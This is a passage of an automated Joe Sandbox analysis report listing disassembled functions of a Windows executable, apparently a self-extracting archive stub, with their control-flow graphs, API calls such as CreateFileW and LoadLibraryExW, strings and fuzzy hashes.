                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1868215902-0
                                                                                      • Opcode ID: 2c8709d01f7cd723c43e4d76cef1dd8e6e7da27ce71b22203c29fcd16f0cbdad
                                                                                      • Instruction ID: 3715b6dcfb8934b65572b9403ae013098ac866517416dfe1dee09f13cbd97521
                                                                                      • Opcode Fuzzy Hash: 2c8709d01f7cd723c43e4d76cef1dd8e6e7da27ce71b22203c29fcd16f0cbdad
                                                                                      • Instruction Fuzzy Hash: 2D019231100744EFC7359F29ED54F86BBBAFB45710F00463AF26E929A0CB752804CB65
                                                                                      Function 00418FC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 896 418fc8-418fe7 GetClassNameW 897 418fe9-418ffe call 410b12 896->897 898 41900f-419011 896->898 903 419000-41900c FindWindowExW 897->903 904 41900e 897->904 899 419013-419016 SHAutoComplete 898->899 900 41901c-419020 898->900 899->900 903->904 904->898
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00418FDF
                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00419016
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00419006
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                      • String ID: EDIT
                                                                                      • API String ID: 4243998846-3080729518
                                                                                      • Opcode ID: 892810c594bdae6fb77f12eec890af469b37268b721b0b9cbdf38c949f5a4460
                                                                                      • Instruction ID: 69ceae9a1c066a59314dfb3f5486278fbca3fcf2f55137808cf2595577e5686a
                                                                                      • Opcode Fuzzy Hash: 892810c594bdae6fb77f12eec890af469b37268b721b0b9cbdf38c949f5a4460
                                                                                      • Instruction Fuzzy Hash: CCF08933A4122877E7306A655C05FDB766C9B49B51F040066FD40F2181D764ED51C6EE
                                                                                      Function 0041BE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 905 41be0a-41be35 call 41cec0 SetEnvironmentVariableW call 40ef07 909 41be3a-41be3e 905->909 910 41be40-41be44 909->910 911 41be62-41be66 909->911 912 41be4d-41be54 call 40effe 910->912 915 41be46-41be4c 912->915 916 41be56-41be5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                      APIs
                                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0041BE20
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0041BE5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable
                                                                                      • String ID: sfxcmd$sfxpar
                                                                                      • API String ID: 1431749950-3493335439
                                                                                      • Opcode ID: 3bfbefef404e7699cbae1d00e4de4c91a137c652c6ac0de313e436a493b87561
                                                                                      • Instruction ID: abf7ded109dc203e41e7dd0807d3c4417a3a3dc428eee6c7103a2762917e083f
                                                                                      • Opcode Fuzzy Hash: 3bfbefef404e7699cbae1d00e4de4c91a137c652c6ac0de313e436a493b87561
                                                                                      • Instruction Fuzzy Hash: 43F0A772801325B7CB212F91DC49EE77B98DF18B51F000167FD84A6191D76D9C90DAE9
                                                                                      Function 0040973D Relevance: 6.1, APIs: 4, Instructions: 99fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 917 40973d-40975e call 41cec0 920 409760-409765 917->920 921 409767 917->921 920->921 922 409769-409786 920->922 921->922 923 409788 922->923 924 40978e-409798 922->924 923->924 925 40979a 924->925 926 40979d-4097c8 CreateFileW 924->926 925->926 927 4097ca-4097ec GetLastError call 40b275 926->927 928 40982c-409841 926->928 934 40981b-409820 927->934 935 4097ee-409810 CreateFileW GetLastError 927->935 929 409843-409856 call 40f10e 928->929 930 40985b-409866 928->930 929->930 934->928 938 409822 934->938 936 409812 935->936 937 409816-409819 935->937 936->937 937->928 937->934 938->928
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0040777A,?,00000005,?,00000011), ref: 004097BD
                                                                                      • GetLastError.KERNEL32(?,?,0040777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004097CA
                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0040777A,?,00000005,?), ref: 004097FF
                                                                                      • GetLastError.KERNEL32(?,?,0040777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00409807
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 8261114be88c5b3f2ef97d17b174653717b7ce123c646ec56b3b2c00c14b5f52
                                                                                      • Instruction ID: 3fdabb0a7b78da84ceac3f8f47fe4e9f24932ea6ab7674d11b3f79e13b02fdf6
                                                                                      • Opcode Fuzzy Hash: 8261114be88c5b3f2ef97d17b174653717b7ce123c646ec56b3b2c00c14b5f52
                                                                                      • Instruction Fuzzy Hash: 553125728403556BD720AB249C45BEBBAA8FB45314F10873AF990973D2D3799C888798
                                                                                      Function 00409613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00409623
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0040963B
                                                                                      • GetLastError.KERNEL32 ref: 0040966D
                                                                                      • GetLastError.KERNEL32 ref: 0040968C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                      • String ID:
                                                                                      • API String ID: 2244327787-0
                                                                                      • Opcode ID: 8731fc9a977f92ccf08b01cd2af6d2610b986f8dad2b35cc9e0e563f25b8a5d6
                                                                                      • Instruction ID: bbb4b0f50a7529cbad656e9548f5b709b5c45d902293de281a1082a135d23292
                                                                                      • Opcode Fuzzy Hash: 8731fc9a977f92ccf08b01cd2af6d2610b986f8dad2b35cc9e0e563f25b8a5d6
                                                                                      • Instruction Fuzzy Hash: 12117930500204EBCF249F61D914A6A77ADEB05325F108A3BF96AA52D2C73F8D40CF5A
                                                                                      Function 004277D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00422213,00000000,00000000,?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue), ref: 00427803
                                                                                      • GetLastError.KERNEL32(?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue,00433768,00433770,00000000,00000364,?,004263F1), ref: 0042780F
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue,00433768,00433770,00000000), ref: 0042781D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: c527a256b247d6777ed83341c2626d2ef873b2c902c7436f8a9ce18f17210d91
                                                                                      • Instruction ID: 6112c2a97fa356c19f856f24aac32a2f37511f4e956d4714b3356372d3b39a9b
                                                                                      • Opcode Fuzzy Hash: c527a256b247d6777ed83341c2626d2ef873b2c902c7436f8a9ce18f17210d91
                                                                                      • Instruction Fuzzy Hash: 8D01F7327492339BC7315B68BC5CE6B7B98AF047B1B501631FA06D7240DB64D801C6E8
                                                                                      Function 0041991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041992F
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419940
                                                                                      • TranslateMessage.USER32(?), ref: 0041994A
                                                                                      • DispatchMessageW.USER32(?), ref: 00419954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4217535847-0
                                                                                      • Opcode ID: 73ffccd032eef0fd2ec0bf37a87d61bc5d9cad1bb058dfefe12293e0bee7da70
                                                                                      • Instruction ID: ca84477f8bf453471b1145135bafbf80a035e73605b743e173faee0e530019ce
                                                                                      • Opcode Fuzzy Hash: 73ffccd032eef0fd2ec0bf37a87d61bc5d9cad1bb058dfefe12293e0bee7da70
                                                                                      • Instruction Fuzzy Hash: DDE0ED72C4212EA78B20EBE6AC4CCDBBF6CEE062657004026B559D2000D6689515C7F5
                                                                                      Function 0040FBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0040FBD5
                                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 0040FC1C
                                                                                        • Part of subcall function 00406DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00406DF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                      • String ID: CreateThread failed
                                                                                      • API String ID: 2655393344-3849766595
                                                                                      • Opcode ID: e935c46ae4045b79a95f29bfd48e930c95a099d85882b9846901c17ace30c5d5
                                                                                      • Instruction ID: fe4af42ff490de6eaf0a4fb41acade12e47c471936cda400ac1cfdc0f0de809f
                                                                                      • Opcode Fuzzy Hash: e935c46ae4045b79a95f29bfd48e930c95a099d85882b9846901c17ace30c5d5
                                                                                      • Instruction Fuzzy Hash: 8901F7723083096BE2346B68AC83F67B769FB44711F20043FF942B51C0CAB56845876C
                                                                                      Function 00409BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,0040C853,00000001,?,?,?,00000000,0041420B,?,?,?,?,?,00413CB0), ref: 00409BE3
                                                                                      • WriteFile.KERNEL32(?,00000000,?,00413EB8,00000000,?,?,00000000,0041420B,?,?,?,?,?,00413CB0,?), ref: 00409C23
                                                                                      • WriteFile.KERNELBASE(?,00000000,?,00413EB8,00000000,?,00000001,?,?,0040C853,00000001,?,?,?,00000000,0041420B), ref: 00409C50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$Handle
                                                                                      • String ID:
                                                                                      • API String ID: 4209713984-0
                                                                                      • Opcode ID: d13a76b39c25e815e212fcb1e0dcb6f8e68fa7000fcb845913fb85fea8594f7d
                                                                                      • Instruction ID: 2b61b8b8607a031de5ec05b1faad3325a693a9d0dc94e6cc261e9e6e80c3c1a0
                                                                                      • Opcode Fuzzy Hash: d13a76b39c25e815e212fcb1e0dcb6f8e68fa7000fcb845913fb85fea8594f7d
                                                                                      • Instruction Fuzzy Hash: 9931287150C605AFEB109E24E848B67B7A8FB51710F04413BF551A72D2C73DEC49CBA9
                                                                                      Function 00409E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EAD
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EE0
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2485089472-0
                                                                                      • Opcode ID: 2adf1b774e7a41a1e7c177c9a6403c17b41c04a9ca4fa989b3b9bbcfa46643e3
                                                                                      • Instruction ID: 21180baac7b5c69426f9a4243c5f9e577e34bbbdc71ca5fbc293bbd3108c733b
                                                                                      • Opcode Fuzzy Hash: 2adf1b774e7a41a1e7c177c9a6403c17b41c04a9ca4fa989b3b9bbcfa46643e3
                                                                                      • Instruction Fuzzy Hash: A001CC3210021966DB21AE699C89FEB37589F06345F08047BF804F61D2DB3C8D81A6EE
                                                                                      Function 00403AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: 984fcf1232c1d878757816999a47608e65c63a3e08f4d72439d6c8489c6bb804
                                                                                      • Instruction ID: c6b4ddac4b5341daa7ad46b143b0046960d5dee294680068efdda4b6b6bc3d3a
                                                                                      • Opcode Fuzzy Hash: 984fcf1232c1d878757816999a47608e65c63a3e08f4d72439d6c8489c6bb804
                                                                                      • Instruction Fuzzy Hash: DD61C171104F44AADB21DF30DC81AE7BBE8AF14306F40496FE19BA7282D6397A48CF15
                                                                                      Function 004282C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004282E8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID:
                                                                                      • API String ID: 1807457897-3916222277
                                                                                      • Opcode ID: 1db684222b530522f77c2aa4bc146dc4fa7667a469ca02b2b4ade03fe4a621b9
                                                                                      • Instruction ID: 5e9293e1010f503e02e0d684425564b1f3c7b24fe62d75f1a1936450950f2bed
                                                                                      • Opcode Fuzzy Hash: 1db684222b530522f77c2aa4bc146dc4fa7667a469ca02b2b4ade03fe4a621b9
                                                                                      • Instruction Fuzzy Hash: 5B416B706052689FDF21CE149C80AFEBBE9DF05708F9404EEE889C7142E639AD46CF64
                                                                                      Function 00401DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401DA6
                                                                                        • Part of subcall function 00403AA3: __EH_prolog.LIBCMT ref: 00403AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: 861c0166a369504ee08e2de91416d77d64ad2a31f6e8680b1116db6d79e72dfc
                                                                                      • Instruction ID: 41212db6fb0b5b26dbccefc65e81a7af28596f5090a74ae6c2efaf43b4ca7f9c
                                                                                      • Opcode Fuzzy Hash: 861c0166a369504ee08e2de91416d77d64ad2a31f6e8680b1116db6d79e72dfc
                                                                                      • Instruction Fuzzy Hash: DD214D369042099FCB15EF99D9419EEFBF6BF58304B10006EE845B72A1CB3A5A51CB68
                                                                                      Function 004018FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: 9b3c7798fa41a23e69fd4489a1394c5d43ec3a35f44e921dc3cb57f608720c5d
                                                                                      • Instruction ID: 15a2359c86b570dfcde082fb04235c09bec79f42f86e4980c23bc2b2e6337e7e
                                                                                      • Opcode Fuzzy Hash: 9b3c7798fa41a23e69fd4489a1394c5d43ec3a35f44e921dc3cb57f608720c5d
                                                                                      • Instruction Fuzzy Hash: BD11B4B0A00205AFDB05DF69C4A59BFFBAABF85304F04402BE805A7391DB399951CB94
                                                                                      Function 00427A09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00427A7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: LCMapStringEx
                                                                                      • API String ID: 2568140703-3893581201
                                                                                      • Opcode ID: ed9f7faa4c5881dbbfee3343bb2c780e59df94511a5ec15e8b5e56aeaac40953
                                                                                      • Instruction ID: b52a822b5f2062d320b43af9cd5568cd36318578ecac9aa3c8e9a3eb9e58974f
                                                                                      • Opcode Fuzzy Hash: ed9f7faa4c5881dbbfee3343bb2c780e59df94511a5ec15e8b5e56aeaac40953
                                                                                      • Instruction Fuzzy Hash: 9B012972640219BBCF029F90DC06EDF7F62EF08724F504255FE1825160C77A9A71AB88
                                                                                      Function 004279A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0042709A), ref: 004279F2
                                                                                      Strings
                                                                                      • InitializeCriticalSectionEx, xrefs: 004279C2
                                                                                      Memory Dump Source
